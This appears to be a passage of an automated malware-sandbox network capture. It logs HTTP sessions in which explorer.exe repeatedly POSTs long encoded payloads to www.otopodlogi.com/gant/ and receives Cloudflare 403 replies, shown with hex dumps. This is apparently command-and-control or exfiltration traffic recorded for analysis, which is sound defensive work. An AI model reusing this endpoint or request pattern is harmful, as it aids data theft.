                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1ym7HCO2KHh59%2FON6Letqyq5cl%2BBNMxfG28Rv%2BFs5%2FEyA%2FVB0GPCqQ5z5aEFZKAgGCOL4BpLQICt7F7Mbjv2C4uSPQFn6HVTsKRpf%2FY4I6D%2BwhGMoS8fySRhVRRjkCY31n5Oyms%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f7705f95b30f4-FRA
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 38 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 ac d8 8e 34 9a a2 eb 78 51 ef a6 89 51 3b 68 83 a2 30 38 c3 3b 12 63 0e 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 85 cb 64 d4 0a 5f 51 fa 9b 48 41 3a b8 ba 84 b3 df 23 08 fd 00 24 92 59 3b 23 4a d3 cf 16 04 9e 82 96 5c 20 01 c9 d4 7c 46 50 d1 8f 37 24 82 f0 d5 6f a8 b8 48 7f a7 f4 49 54 25 07 e0 b8 a8 b3 6f 13 75 fe 82 a8 f3 6f 10 35 77 95 34 df 71 cc ca 43 29 94 ee 4a 5a 20 e3 51 2b 74 c2 49 8c de be bf 81 5c 0b e5 2c 38 0d b9 d1 0b 11 0b 87 1c ae ae e1 4f 58 af d7 7d ed 74 ae b9 d4 73 d1 4f 74 06 7f c2 85 d4 4b 9e 4a 66 30 0c 4a 21 ad 30 43 c7 20 59 30 63 d1 cd c8 c7 db 7f d1 73 02 41 3d b0 70 2e a7 f8 c7 52 ac 66 e4 42 2b 87 ca d1 db 4d 8e 04 92 b2 35 23 0e 1f 5c e0 8d 99 6e c5 bc 24 e5 57 fa f1 07 7a a1 b3 9c 39 11 cb a6 a0 ab cb d9 25 9f 63 63 9d 62 19 ce 88 d1 b1 76 b6 31 51 69 a1 38 3e f4 40 e9 54 4b a9 d7 07 4b 56 02 d7 b9 36 ae b1 68 2d b8 5b cc 38 ae 44 82 b4 68 f4 84 12 4e 30 49 6d c2 24 ce 86 a5 14 29 d4 3d 18 94 33 62 dd 46 a2 5d 20 3a 02 82 cf 48 92 de 95 5d 34 b1 96 c0 c2 60 3a 23 41 c2 15 4d e6 22 28 87 82 8c 09 d5 2f c6 83 a8 d5 6a 85 36 31 22 77 51 ab 93 2e 55 e2 84 56
                                                                                                                  Data Ascii: 890Xko7_qT54xQQ;h08;c9%)B<n`_qxyxWo?\~d_QHA:#$Y;#J\ |FP7$oHIT%ouo5w4qC)JZ Q+tI\,8OX}tsOtKJf0J!0C Y0csA=p.RfB+M5#\n$Wz9%ccbv1Qi8>@TKKV6h-[8DhN0Im$)=3bF] :H]4`:#AM"(/j61"wQ.UV


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  12192.168.11.2049853188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:43.169122934 CET634OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.otopodlogi.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.otopodlogi.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 76 38 35 4a 6b 4f 6e 76 41 5a 34 73 52 34 74 6b 4f 66 78 57 79 4d 6e 33 64 30 34 4f 43 39 30 7e 34 66 72 39 48 79 77 50 68 4a 46 44 2d 38 4b 64 4b 58 68 67 6d 79 37 55 4f 32 47 36 4f 57 35 7e 6c 68 6e 78 47 39 5f 6f 76 55 69 33 6e 54 44 62 50 4b 78 30 73 54 4c 64 6a 35 64 4a 43 52 6b 49 4a 65 4f 32 79 63 53 51 46 34 63 42 50 46 77 38 78 51 39 65 79 42 67 53 43 71 57 78 78 4c 4b 4e 70 75 34 67 79 46 77 6d 53 63 57 39 59 77 44 38 54 48 53 41 68 54 73 62 4f 34 47 62 42 34 77 41 30 37 4c 4f 52 54 6d 4f 30 72 50 63 33 4b 69 63 38 7a 30 46 69 45 67 37 6d 39 5a 4d 43 61 54 77 51 4a 54 65 67 4d 47 59 64 37 73 6f 72 63 4d 41 52 57 67 68 39 74 46 34 33 45 48 72 52 51 74 72 61 5a 66 59 6c 5a 74 63 32 79 42 78 5f 62 6e 77 46 4f 4b 5a 70 36 57 77 6e 6c 4b 42 32 52 6a 78 72 31 52 35 67 50 75 75 6a 6a 62 33 47 71 64 65 4a 4b 48 36 49 53 73 4f 41 66 78 28 51 39 36 65 76 63 4f 4e 38 39 54 72 6d 4a 37 68 56 46 65 28 30 7e 5f 28 64 55 50 72 68 4d 56 54 65 76 44 4b 77 59 55 74 78 75 78 41 66 66 49 77 79 55 33 56 5a 6d 48 74 45 6b 46 42 36 33 64 6b 79 7a 6d 52 45 4f 73 35 4e 79 6e 7e 39 45 46 38 75 58 6c 6b 48 72 5a 4f 74 61 71 58 43 30 63 75 30 6b 6f 71 4e 30 36 71 6a 58 55 38 39 76 64 72 72 4e 63 33 71 7a 31 7a 6e 53 66 4f 68 4f 2d 69 48 77 75 30 38 34 68 52 6f 74 4c 77 4c 65 37 63 74 53 44 48 65 49 75 69 79 69 41 4d 33 51 46 42 53 4d 75 36 68 33 4a 67 57 74 35 63 56 59 54 37 6f 70 6b 46 54 41 63 59 7a 30 4a 4a 38 38 42 52 75 4d 45 4c 75 53 73 32 4d 38 65 6a 61 43 62 6e 76 4b 58 6e 45 7e 6d 42 6c 6d 33 71 33 43 50 43 76 33 64 44 45 37 4f 48 5a 67 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7v85JkOnvAZ4sR4tkOfxWyMn3d04OC90~4fr9HywPhJFD-8KdKXhgmy7UO2G6OW5~lhnxG9_ovUi3nTDbPKx0sTLdj5dJCRkIJeO2ycSQF4cBPFw8xQ9eyBgSCqWxxLKNpu4gyFwmScW9YwD8THSAhTsbO4GbB4wA07LORTmO0rPc3Kic8z0FiEg7m9ZMCaTwQJTegMGYd7sorcMARWgh9tF43EHrRQtraZfYlZtc2yBx_bnwFOKZp6WwnlKB2Rjxr1R5gPuujjb3GqdeJKH6ISsOAfx(Q96evcON89TrmJ7hVFe(0~_(dUPrhMVTevDKwYUtxuxAffIwyU3VZmHtEkFB63dkyzmREOs5Nyn~9EF8uXlkHrZOtaqXC0cu0koqN06qjXU89vdrrNc3qz1znSfOhO-iHwu084hRotLwLe7ctSDHeIuiyiAM3QFBSMu6h3JgWt5cVYT7opkFTAcYz0JJ88BRuMELuSs2M8ejaCbnvKXnE~mBlm3q3CPCv3dDE7OHZg.
                                                                                                                  Feb 13, 2023 19:00:43.344225883 CET635INHTTP/1.1 403 Forbidden
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Referrer-Policy: same-origin
                                                                                                                  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GSXygt4W6rg9Xm9nsgbt48Yn%2FXQUQKDYSiDP9iuksgF7pH8RdAX9JsIHIouWaMh1R2aYGLh%2F3W0u%2F4aLWmU7gVvUFp2xV3X%2Bar5wghRXif3DgQq91Sk8b0IzCnXxDrkziNtHYcs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 798f7715dc7630c3-FRA
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 58 6b 6f 1b 37 16 fd ae 5f 71 c3 05 54 09 10 35 92 ac d8 8e 34 9a a2 eb 78 51 ef a6 89 51 3b 68 83 a2 30 38 c3 3b 12 63 0e 39 25 29 c9 42 ea ff be e0 3c e4 d1 c3 6e 82 c5 a2 fe 60 0d 5f 97 f7 71 78 79 78 c3 57 6f 3f 5c dc 7e ba be 84 85 cb 64 d4 0a 5f 51 fa 9b 48 41 3a b8 ba 84 b3 df 23 08 fd 00 24 92 59 3b 23 4a d3 cf 16 04 9e 82 96 5c 20 01 c9 d4 7c 46 50 d1 8f 37 24 82 f0 d5 6f a8 b8 48 7f a7 f4 49 54 25 07 e0 b8 a8 b3 6f 13 75 fe 82 a8 f3 6f 10 35 77 95 34 df 71 cc ca 43 29 94 ee 4a 5a 20 e3 51 2b 74 c2 49 8c de be bf 81 5c 0b e5 2c 38 0d b9 d1 0b 11 0b 87 1c ae ae e1 4f 58 af d7 7d ed 74 ae b9 d4 73 d1 4f 74 06 7f c2 85 d4 4b 9e 4a 66 30 0c 4a 21 ad 30 43 c7 20 59 30 63 d1 cd c8 c7 db 7f d1 73 02 41 3d b0 70 2e a7 f8 c7 52 ac 66 e4 42 2b 87 ca d1 db 4d 8e 04 92 b2 35 23 0e 1f 5c e0 8d 99 6e c5 bc 24 e5 57 fa f1 07 7a a1 b3 9c 39 11 cb a6 a0 ab cb d9 25 9f 63 63 9d 62 19 ce 88 d1 b1 76 b6 31 51 69 a1 38 3e f4 40 e9 54 4b a9 d7 07 4b 56 02 d7 b9 36 ae b1 68 2d b8 5b cc 38 ae 44 82 b4 68 f4 84 12 4e 30 49 6d c2 24 ce 86 a5 14 29 d4 3d 18 94 33 62 dd 46 a2 5d 20 3a 02 82 cf 48 92 de 95 5d 34 b1 96 c0 c2 60 3a 23 41 c2 15 4d e6 22 28 87 82 8c 09 d5 2f c6 83 a8 d5 6a 85 36 31 22 77 51 ab 93 2e 55 e2 84 56 9d ee 17 91 76 b8
                                                                                                                  Data Ascii: 89aXko7_qT54xQQ;h08;c9%)B<n`_qxyxWo?\~d_QHA:#$Y;#J\ |FP7$oHIT%ouo5w4qC)JZ Q+tI\,8OX}tsOtKJf0J!0C Y0csA=p.RfB+M5#\n$Wz9%ccbv1Qi8>@TKKV6h-[8DhN0Im$)=3bF] :H]4`:#AM"(/j61"wQ.UVv
                                                                                                                  Feb 13, 2023 19:00:43.344245911 CET637INData Raw: 4e 96 19 2a d7 67 9c 5f ae 50 b9 77 c2 3a 54 68 da ed b5 50 5c af fb bf fe f4 ee 47 e7 f2 9f f1 8f 25 5a d7 6e ff fb e6 c3 fb f2 7f df 3a 23 d4 5c a4 9b ee 97 15 33 80 b3 ad 6c 56 f6 24 b3 ad fc 39 ba 4b 89 fe f3 9f 9b 2b de 21 68 8c 36 34 45 e4
                                                                                                                  Data Ascii: N*g_Pw:ThP\G%Zn:#\3lV$9K+!h64E1K]nHaIg7hBH#'h'_d8zy[BquC?8 93FE;]8.{>[YuSGo$H#0
                                                                                                                  Feb 13, 2023 19:00:43.344258070 CET637INData Raw: a9 3c bd 2d 74 3f 46 46 c1 6d 72 9c 91 b2 87 44 9f d0 86 41 d9 88 fe 3e c5 94 de d7 eb bd de 55 6b 9f 69 ed 47 b8 7a 8a c1 3e 27 3e 1e c3 f2 d9 f6 64 f0 ed 82 a9 fb e2 c4 79 cc 6e f4 d2 6c 05 bd 6a 6e 5f a7 a9 23 58 db d2 be 12 12 f0 c4 57 0f f8
                                                                                                                  Data Ascii: <-t?FFmrDA>UkiGz>'>dynljn_#XW[,f|Cgy5+S1?2(fI&uIJg*f~sa#Uy(G-f"hA=%qyF93*!+WW|>9y*WE{vpcNc{c4v;Q$e
                                                                                                                  Feb 13, 2023 19:00:43.344269037 CET637INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  13192.168.11.2049854188.114.97.380C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:00:45.701263905 CET640OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.otopodlogi.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.otopodlogi.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.otopodlogi.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 76 38 35 4a 6b 4f 6e 76 41 5a 34 73 52 34 74 6b 4f 66 78 57 79 4d 6e 33 64 30 34 4f 43 39 30 7e 34 66 72 39 48 79 77 50 68 52 46 44 4d 6b 4b 50 37 58 68 79 32 79 37 4c 2d 32 48 36 4f 57 42 7e 6c 70 72 78 47 77 49 6f 70 59 69 32 30 62 44 61 36 65 78 6b 63 53 73 45 54 34 62 4e 43 51 34 49 4a 54 48 32 32 4e 76 51 52 77 63 43 4d 64 77 33 6d 73 36 53 43 41 4b 53 43 71 67 31 78 4b 33 4e 70 71 6f 67 79 4a 77 6d 55 55 57 38 71 59 44 35 45 54 53 4e 52 54 7a 56 75 34 44 52 68 35 41 41 30 76 31 4f 52 53 64 4f 78 4c 50 63 30 75 69 66 39 7a 33 47 43 45 67 36 6d 39 59 49 43 47 58 77 52 6b 4f 65 68 34 47 59 61 76 73 71 4c 63 4d 4b 54 7e 76 6f 39 74 44 72 6e 45 75 76 52 63 31 72 65 35 74 59 6b 74 74 66 47 32 42 77 4d 6a 6e 7a 68 61 4b 62 4a 36 59 74 58 6c 43 4b 57 52 46 78 72 46 4e 35 68 75 62 75 68 50 62 32 6e 4b 64 56 49 4b 45 39 6f 53 71 42 67 66 6f 37 51 67 31 65 76 4e 52 4e 38 38 49 72 6a 74 37 68 68 42 65 34 41 4b 2d 39 4e 55 45 28 52 4d 45 5a 2d 69 4d 4b 77 45 6d 74 77 58 75 41 66 72 49 28 79 55 33 54 36 65 49 34 45 6b 43 63 71 32 51 6e 43 7a 31 52 45 79 4b 35 4a 72 53 7e 4e 67 46 74 4b 7a 6c 75 33 72 61 45 74 61 55 59 69 30 57 71 30 6b 6f 71 4e 6f 51 71 6a 62 55 38 4a 72 64 71 59 6c 63 6d 70 62 31 31 6e 53 5a 4f 68 50 36 69 48 39 4f 30 39 42 43 52 70 64 68 77 49 79 37 63 38 43 44 45 62 38 74 77 79 69 42 49 33 51 53 4c 79 42 78 36 68 37 52 67 57 39 32 64 6e 73 54 36 6f 5a 6b 4f 7a 41 66 53 7a 31 44 41 63 38 58 56 75 51 51 4c 76 7e 57 32 4e 35 47 6a 61 71 62 71 72 6e 72 6a 55 4b 6c 44 57 75 4a 6d 77 7e 39 46 2d 61 64 41 6d 71 46 55 70 41 59 4d 46 4b 4b 53 56 64 5f 42 49 79 4b 6a 4d 4c 6a 50 48 56 2d 79 33 64 63 32 72 76 38 35 4f 38 71 6f 44 4f 48 67 69 42 69 65 70 55 52 61 32 38 73 77 78 4f 6d 50 5a 64 69 44 4c 6f 75 71 5a 4d 47 37 67 59 4a 4d 54 62 69 49 67 53 6c 55 37 46 45 36 43 72 59 74 45 4a 53 28 4c 79 54 73 4b 65 61 6f 4f 6d 65 54 79 6a 69 52 51 4f 66 74 30 38 61 47 6d 53 67 39 35 33 4e 44 50 35 30 6c 39 49 48 70 78 7a 66 31 36 4e 65 42 36 73 55 4f 43 64 52 77 68 51 46 79 62 76 70 31 62 77 5f 4d 47 63 44 47 65 38 75 4d 72 66 30 47 2d 66 53 38 69 64 31 50 57 52 76 73 37 34 78 73 6b 67 37 30 50 35 74 64 32 65 43 42 46 39 47 79 61 73 79 44 44 54 33 64 32 62 73 72 51 67 4e 6c 51 4f 70 63 77 55 42 32 30 64 44 37 72 6d 73 45 73 53 37 4e 74 6b 53 69 36 75 63 75 4f 64 31 36 70 63 38 56 6c 67 68 79 74 7a 5f 4d 65 6d 6a 32 30 7e 72 71 4b 65 45 6d 6d 67 53 37 62 28 38 50 52 4a 75 6e 72 52 45 54 4a 76 73 42 2d 31 50 6d 4f 34 77 4a 33 68 5f 72 59 42 31 48 6b 42 65 77 46 75 41 38 44 63 36 74 6a 77 4e 6f 76 53 79 38 7a 53 47 42 53 63 4b 61 32 37 52 6e 77 46 6d 53 32 4e 30 4c 71 47 72 39 32 64 52 62 70 62 57 63 30 6d 34 68 5f 79 4c 4d 6a 6d 46 39 54 74 58 66 49 52 49 44 44 79 66 72 42 7e 50 78 6d 6b 74 55 30 47 36 58 48 68 5a 72 66 6a 2d 78 35 49 76 6b 4e 6d 6f 64 6b 6c 59 31 51 72 36 45 2d 4e 72 32 30 5a 71 34 6b 62 2d 70 4f 68 4a 38 64 31 4e 32 31 32 45 33 75 4f 30 73 57 46 38 66 50 63 44 70 4d 4e 6e 57 46 64 67 7e 4c 66 44 63 57 59 45 76 38 4a 48 50 38 4f 57 68 4b 57 61 51 77 44 62 78 33 67 5f 28 35 66 33 61 54 45 65 37 64 69 4e 70 46 4d 47 7a 58 65 77 75 4c 44 4e 55 78 77 7a 28 4b 42 4e 5a 41 53 70 50 70 7a 34 6c 5a 62 65 57 7a 5a 30 59 4a 65 66 58 39 72 63 46 72 4d 5f 68 79 5a 31 49 6b 41 68 47 6d 75 35 67 79 57 42 57 6c 62 6f 31 43 4f 79 33 49 56 58 52 41 52 58 37 48 33 59 6b 74 72 65 48 68 54 49 30 70 6e 6f 35 66 77 56 28 51 33 34 49 64 55 70 4a 37 34 4b 32 79 43 30 56 54 75 67 4c 37 4f 6e 65 39 69 4c 55 42 47 4b 6d 69 39 67 69 74 32 59 36 4e 4a 67 6c 4b 58 54 65 53 4d 31 6e 46 31 75 77 56 57 73 4d 49 39 5f 30 48 57 55 45 4e 4b 4c 35 39 48 5f 59 6f 5a 41 74 4d 59 6a 67 7a 51 2d 33 33 63 52 56 38 69 73 32 5a 74 63 75 37 54 59 67 4d 7e 53 78 66 67 36 52 78 53 45 61 73 67 6f 67 36 42 4f 38 2d 34 70 33 71 75 69 72 54 71 36 70 75 54 50 72 71 46 6a 4d 50 58 48 45 61 49 4e 7e 5f 55 33 36 4b 32 4b 6b 49 72 69 51 35 34 76 4a 76 67 66 6d 43 72 50 75 4c 65 44 33 54 7e 61 58 67 53 33 4b 74 4e 32 75 31 56 42 59 43 79 50 71 57 44 36 44 45 5a 52 74 65 30 62 59 6a 36 48 59 6b 58 78 43 32 76 74 67 6c 49 51 76 79 44 34
                                                                                                                  Data Ascii: j-Jh9P=7v85JkOnvAZ4sR4tkOfxWyMn3d04OC90~4fr9HywPhRFDMkKP7Xhy2y7L-2H6OWB~lprxGwIopYi20bDa6exkcSsET4bNCQ4IJTH22NvQRwcCMdw3ms6SCAKSCqg1xK3NpqogyJwmUUW8qYD5ETSNRTzVu4DRh5AA0v1ORSdOxLPc0uif9z3GCEg6m9YICGXwRkOeh4GYavsqLcMKT~vo9tDrnEuvRc1re5tYkttfG2BwMjnzhaKbJ6YtXlCKWRFxrFN5hubuhPb2nKdVIKE9oSqBgfo7Qg1evNRN88Irjt7hhBe4AK-9NUE(RMEZ-iMKwEmtwXuAfrI(yU3T6eI4EkCcq2QnCz1REyK5JrS~NgFtKzlu3raEtaUYi0Wq0koqNoQqjbU8JrdqYlcmpb11nSZOhP6iH9O09BCRpdhwIy7c8CDEb8twyiBI3QSLyBx6h7RgW92dnsT6oZkOzAfSz1DAc8XVuQQLv~W2N5GjaqbqrnrjUKlDWuJmw~9F-adAmqFUpAYMFKKSVd_BIyKjMLjPHV-y3dc2rv85O8qoDOHgiBiepURa28swxOmPZdiDLouqZMG7gYJMTbiIgSlU7FE6CrYtEJS(LyTsKeaoOmeTyjiRQOft08aGmSg953NDP50l9IHpxzf16NeB6sUOCdRwhQFybvp1bw_MGcDGe8uMrf0G-fS8id1PWRvs74xskg70P5td2eCBF9GyasyDDT3d2bsrQgNlQOpcwUB20dD7rmsEsS7NtkSi6ucuOd16pc8Vlghytz_Memj20~rqKeEmmgS7b(8PRJunrRETJvsB-1PmO4wJ3h_rYB1HkBewFuA8Dc6tjwNovSy8zSGBScKa27RnwFmS2N0LqGr92dRbpbWc0m4h_yLMjmF9TtXfIRIDDyfrB~PxmktU0G6XHhZrfj-x5IvkNmodklY1Qr6E-Nr20Zq4kb-pOhJ8d1N212E3uO0sWF8fPcDpMNnWFdg~LfDcWYEv8JHP8OWhKWaQwDbx3g_(5f3aTEe7diNpFMGzXewuLDNUxwz(KBNZASpPpz4lZbeWzZ0YJefX9rcFrM_hyZ1IkAhGmu5gyWBWlbo1COy3IVXRARX7H3YktreHhTI0pno5fwV(Q34IdUpJ74K2yC0VTugL7One9iLUBGKmi9git2Y6NJglKXTeSM1nF1uwVWsMI9_0HWUENKL59H_YoZAtMYjgzQ-33cRV8is2Ztcu7TYgM~Sxfg6RxSEasgog6BO8-4p3quirTq6puTPrqFjMPXHEaIN~_U36K2KkIriQ54vJvgfmCrPuLeD3T~aXgS3KtN2u1VBYCyPqWD6DEZRte0bYj6HYkXxC2vtglIQvyD47tR_3TCcoYxwuvkYzgQskTMph_i-cVFnTWJdkyA9BmqEWCBDkHoTPefUW0rtuBtWl73yBqUYBpQfj7syK14VeCR5z71v4xTk7ssTvv3VF-VB1uSCizGkdaOFEljwHjZNg1eOw666XFAezZIl9udZTkNeZnqhJtKcOhB9Rx53IeOcI-dYQRchNVFve4(w7A607qJpgz9f0_qmwqaoUEB-XfRJ9v(nHIQNjetGcPTzs1PEhSmaaJjBrW396C1eEMwiNgeTzbkx(GBjgcaUAnRE2xHkHPsdHB~4oe7dbjN947y48uIn1gmH6RhFt9xVuS6_kbF7WZdAXEcZk9t5uTHzITWMDPysX0OCeEp4GLK2kzMeFu6p7hygFmreToRnjUKH234YgA9PAr1UnZAWBo2EKizlm_DzzmjLQlVPgWlrdDlGcNh4BizzvcOhvAGPUBtOIN58VhOHKXK-v9vt(yk9G2rHz4aFfm5q~1jWdaq21AiEgEQpWXo8Fbkw1P0n~3bbsfKLrOBNyqll6yHwXiKkDCtzATb9BPJYKl~Kyjeq55IOgniov9okt4dY2bFDflJ2tpRL7UtK7FJFRcskVkcl5VpGDIjO1ATSlhkaeY44Gti4ZMv0A0HZWNFt6PemPuMYL97JejydUQz4dSORVmHZ(-m8vQHFJ139(KPH9nOe3K~tcUIRQXmr0TzAXwfIoAQ72B8fG_fZtXWD4ohSWsCH38b123ilb0L7G2xtf8CKLvidjuEAACihHIopPLP9H8gN5p2SwyOApWfhwUwuMRnQkMeNuIIWZ15SWJXERtz5d
                                                                                                                  Feb 13, 2023 19:00:45.701355934 CET650OUTData Raw: 4c 56 55 55 72 48 38 74 62 47 4d 38 69 76 73 39 76 59 74 51 5f 33 68 66 34 56 5f 4f 76 7e 55 41 6d 78 35 47 35 62 73 4a 64 6a 64 59 68 79 6b 55 4c 38 70 69 37 39 68 69 41 79 62 41 75 57 58 64 6c 63 4d 58 7a 28 4f 70 31 6a 36 7a 45 6c 50 65 67 4b
                                                                                                                  Data Ascii: LVUUrH8tbGM8ivs9vYtQ_3hf4V_Ov~UAmx5G5bsJdjdYhykUL8pi79hiAybAuWXdlcMXz(Op1j6zElPegKK1eSns-49KOKOfs0v~vz-Yj0aJdu9Hh(UNisOmcnUT_98W7vmlkOo7x7mUMjJI7EbYCNErIVY1kFVnBdZxMl5W418eYhotkOyj52ZNbsK85q5wOJdWLLWXlg_k9H6Z5Nf506Rc2Alsb~xH1C5Zmt71eqNTkSeTaFe
                                                                                                                  Feb 13, 2023 19:00:45.710618973 CET653OUTData Raw: 4a 79 71 35 68 57 4f 73 32 4e 5a 75 53 4e 6a 4a 76 48 55 62 6f 72 68 32 58 37 73 33 59 62 57 5a 45 50 57 77 31 47 7a 31 78 66 4b 58 5f 28 78 77 55 51 79 43 54 46 7a 53 78 47 66 71 69 30 54 74 78 36 66 48 61 43 75 58 78 30 61 65 50 4e 4c 66 55 59
                                                                                                                  Data Ascii: Jyq5hWOs2NZuSNjJvHUborh2X7s3YbWZEPWw1Gz1xfKX_(xwUQyCTFzSxGfqi0Ttx6fHaCuXx0aePNLfUY9gH38K02k5cTdbh6HG9TW7xhsmUi3hEXdG-hv(Nsz368VYj6RL2qlCkqcgQnEnSfocJUCi6b9Z23xrIhtcBFA(RyF30mNf7HSwpRZiL6E4IEIk3lFjmrdWqHBoccCpiZ4WBQGeW8mpCVQ28CbX-ftpjBqpq4hnViC
                                                                                                                  Feb 13, 2023 19:00:45.710787058 CET661OUTData Raw: 78 44 71 55 76 44 54 39 30 4e 45 6a 78 76 4c 33 6d 50 6c 35 31 4c 45 38 44 68 71 42 6c 45 76 45 6e 67 5f 36 30 58 53 75 61 6b 32 39 63 4a 63 64 39 75 37 53 34 33 2d 62 56 36 74 6d 6d 6f 64 77 4b 36 55 36 67 7e 61 70 44 42 51 75 43 78 54 62 79 59
                                                                                                                  Data Ascii: xDqUvDT90NEjxvL3mPl51LE8DhqBlEvEng_60XSuak29cJcd9u7S43-bV6tmmodwK6U6g~apDBQuCxTbyYc3i8intE_CpMWrHxfSXcxrhmw2rgz608gE_dZxJJltJfutlGCz6abQ0trbHtdY98T57lUq_uZgu~PGLpug5yGPn4cu8GLsExaLUdKrY9OCQG8Cs2O54LcQ19J7fHdh8Sbv0sVdU0Pg8725rvCspG_TPEPFeb50YoR
                                                                                                                  Feb 13, 2023 19:00:45.710953951 CET662OUTData Raw: 63 48 78 6c 58 50 7a 64 65 30 6f 58 67 49 77 4f 39 4d 42 51 4a 72 6b 6d 32 45 6a 49 43 7e 4e 30 6f 52 58 51 4a 37 48 38 5f 4f 6d 56 4e 6f 46 64 55 72 7a 64 4d 66 4f 6e 68 77 63 71 35 64 36 6a 41 49 59 72 54 45 78 4d 32 37 4f 75 35 6a 4f 52 66 74
                                                                                                                  Data Ascii: cHxlXPzde0oXgIwO9MBQJrkm2EjIC~N0oRXQJ7H8_OmVNoFdUrzdMfOnhwcq5d6jAIYrTExM27Ou5jORft_tYq9unXUXZIJpXiE8ukhCK0gtFjBVd6kn343vU1XDCbr7NcKl6C1892XeIjfDy9j94gmuKB920FCxU(I728lTjiM9WOSXg94vWHJOCT30LeG0Mx09LG8nCCnH_fJMHAC6k0YaDFJGONozQJuoPIDgGqzrm2XS3hA
                                                                                                                  Feb 13, 2023 19:00:45.711131096 CET665OUTData Raw: 6b 69 53 35 52 31 43 41 53 6c 42 4a 4b 48 72 30 41 75 62 4b 61 28 68 67 35 77 35 66 5a 66 4a 65 4b 54 4f 48 55 6c 6e 46 68 64 30 41 32 39 52 6b 68 4b 6b 6e 32 56 54 4c 33 66 4c 4e 35 61 33 54 66 7e 37 57 38 55 76 35 61 6f 31 6c 54 67 4d 72 6b 65
                                                                                                                  Data Ascii: kiS5R1CASlBJKHr0AubKa(hg5w5fZfJeKTOHUlnFhd0A29RkhKkn2VTL3fLN5a3Tf~7W8Uv5ao1lTgMrkeH3F8I9ZPWQqglpNPRMWAgNemAyQDkqcUJVVAj~JnH5TPY8sFxab5HauUGuS2_ppCjHZQ0BLSQb4o5X6PrTpC4GYga43VxkisgR8XAVB~3BYd02D3snsuFe2TBgg4WHonhTaNBbhBkZrG2t_H1hX3ANuQmYQHfu0iQ
                                                                                                                  Feb 13, 2023 19:00:45.711257935 CET674OUTData Raw: 5a 6f 64 30 47 4b 54 75 38 37 55 77 5a 78 68 58 65 53 63 53 2d 69 68 33 47 61 38 6a 54 36 5a 28 33 33 75 51 53 38 44 7e 73 75 61 46 46 37 73 7a 49 49 55 44 48 57 7a 71 65 78 61 6f 6e 28 79 7a 74 78 38 43 6f 71 35 6e 43 63 6d 7e 72 67 46 71 44 4d
                                                                                                                  Data Ascii: Zod0GKTu87UwZxhXeScS-ih3Ga8jT6Z(33uQS8D~suaFF7szIIUDHWzqexaon(yztx8Coq5nCcm~rgFqDMn3BhD7azx4qWpsRxXoj1M0SxJTn7FuevHSW1bdu517OAqhOF1F3Hrt5cuhDxadZLi2ey6INjIOub5z-v27Ge_OwZjO0JzGygJc4rp0OSid_p-yu~yWCNh9a3Bk4K6~VMgIlnHGJm-d0(cLaicUGGEvuw7120TpNPl
